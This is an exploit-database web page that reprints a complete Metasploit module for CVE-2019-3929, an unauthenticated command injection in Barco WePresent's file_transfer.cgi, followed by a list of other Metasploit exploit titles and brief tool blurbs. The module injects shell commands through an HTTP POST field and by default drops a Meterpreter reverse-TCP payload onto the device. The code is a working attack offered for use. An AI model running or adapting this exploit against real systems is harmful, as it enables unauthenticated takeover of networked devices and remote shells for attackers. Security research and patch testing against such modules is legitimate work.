Search for hundreds of thousands of exploits

"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)"

Author

Exploit author

Metasploit

Platform

Exploit platform

linux

Release date

Exploit published date

2020-01-15

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Barco WePresent file_transfer.cgi Command Injection",
      'Description'    => %q(
        This module exploits an unauthenticated remote command injection
        vulnerability found in Barco WePresent and related OEM'ed products.
        The vulnerability is triggered via an HTTP POST request to the
        file_transfer.cgi endpoint.
      ),
      'License'        => MSF_LICENSE,
      'Author'         => 'Jacob Baines', # @Junior_Baines'
      'References'     =>
        [
          ['CVE', '2019-3929'],
          ['EDB', '46786'],
          ['URL', 'https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c']
        ],
      'DisclosureDate' => "Apr 30, 2019",
      'Platform'       => ['unix', 'linux'],
      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
      'Privileged'     => false,
      'Targets'        => [
        ['Unix In-Memory',
         'Platform'    => 'unix',
         'Arch'        => ARCH_CMD,
         'Type'        => :unix_memory,
         'Payload'     => {
           'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnetd' }
         }],
        ['Linux Dropper',
         'Platform'        => 'linux',
         'Arch'            => ARCH_ARMLE,
         'CmdStagerFlavor' => ['printf', 'wget'],
         'Type'            => :linux_dropper]
      ],
      'DefaultTarget'  => 1,
      'DefaultOptions' => {
        'SSL'               => true,
        'RPORT'             => 443,
        'CMDSTAGER::FLAVOR' => 'printf',
        'PAYLOAD'           => 'linux/armle/meterpreter/reverse_tcp'
      }))
  end

  def filter_bad_chars(cmd)
    cmd.gsub!(/;/, 'Pa_Note')
    cmd.gsub!(/\+/, 'Pa_Add')
    cmd.gsub!(/&/, 'Pa_Amp')
    return cmd
  end

  def send_command(cmd, timeout)
    vars_post = {
      file_transfer: 'new',
      dir: "'#{filter_bad_chars(cmd)}'"
    }

    send_request_cgi({
      'uri'       => '/cgi-bin/file_transfer.cgi',
      'method'    => 'POST',
      'vars_post' => vars_post
    }, timeout)
  end

  def check
    check_resp = send_command(";whoami;", 5)
    unless check_resp
      return CheckCode::Unknown('Connection failed.')
    end

    if check_resp.code == 200
      check_resp.body.gsub!(/[\r\n]/, "")
      if check_resp.body == "root"
        return CheckCode::Vulnerable
      end
    end

    CheckCode::Safe
  end

  def execute_command(cmd, _opts = {})
    send_command(";(#{cmd})&", nil)
  end

  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(linemax: 128)
    end
  end
end
Release DateTitleTypePlatformAuthor
2020-05-25"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)"remotewindowsMetasploit
2020-05-25"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)"remotehardwareMetasploit
2020-05-22"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)"remotemultipleMetasploit
2020-05-19"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)"remotephpMetasploit
2020-05-01"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)"remotemultipleMetasploit
2020-04-28"Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-04-20"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)"remotelinuxMetasploit
2020-04-17"Nexus Repository Manager - Java EL Injection RCE (Metasploit)"remotelinuxMetasploit
2020-04-16"TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)"remotelinux_mipsMetasploit
2020-04-16"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)"localmacosMetasploit
2020-04-16"DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)"remotewindowsMetasploit
2020-04-16"Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-04-16"PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)"remotephpMetasploit
2020-04-16"Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)"remotejavaMetasploit
2020-04-16"ThinkPHP - Multiple PHP Injection RCEs (Metasploit)"remotelinuxMetasploit
2020-04-16"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)"remotemultipleMetasploit
2020-03-31"Redis - Replication Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-31"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)"remotemultipleMetasploit
2020-03-31"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)"remotehardwareMetasploit
2020-03-31"SharePoint Workflows - XOML Injection (Metasploit)"remotewindowsMetasploit
2020-03-17"ManageEngine Desktop Central - Java Deserialization (Metasploit)"remotemultipleMetasploit
2020-03-17"Rconfig 3.x - Chained Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-10"Nagios XI - Authenticated Remote Command Execution (Metasploit)"remotelinuxMetasploit
2020-03-10"PHPStudy - Backdoor Remote Code execution (Metasploit)"remotephpMetasploit
2020-03-09"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)"locallinuxMetasploit
2020-03-09"PHP-FPM - Underflow Remote Code Execution (Metasploit)"remotephpMetasploit
2020-03-09"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)"remotemultipleMetasploit
2020-03-09"Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)"remotemultipleMetasploit
2020-03-09"Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)"remotemultipleMetasploit
2020-03-09"Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)"remotewindowsMetasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47924/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.